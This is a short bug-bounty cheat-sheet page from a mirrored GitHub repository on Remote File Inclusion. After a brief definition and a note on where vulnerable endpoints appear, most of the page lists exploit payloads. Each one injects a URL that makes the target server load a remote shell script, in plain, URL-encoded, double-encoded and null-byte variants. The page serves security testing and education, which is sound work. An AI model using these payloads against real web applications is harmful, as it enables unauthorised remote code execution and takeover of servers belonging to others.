AllAboutBugBounty/Remote File Inclusion.md at 395710e20f1ae1202a60ed925b476054c3930507 - AllAboutBugBounty - TheRedTeam

ch0ic3/AllAboutBugBounty

mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00

Muhammad Daffa abd025fb64 Add 'Where to find' in each readme, add Apache + CRLF + RFI

2022-06-22 11:41:21 +07:00

782 B

Raw Blame History

Remote File Inclusion (RFI)

Introduction

Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts.

Where to find

Any endpoint that includes a file from a web server. For example, /index.php?page=index.html

How to exploit

Basic payload

http://example.com/index.php?page=http://daffa.info/shell.php

URL encoding

http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php

Double encoding

http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php

Using Null Byte (%00)

http://example.com/index.php?page=http://daffa.info/shell.php%00

References

payloadbox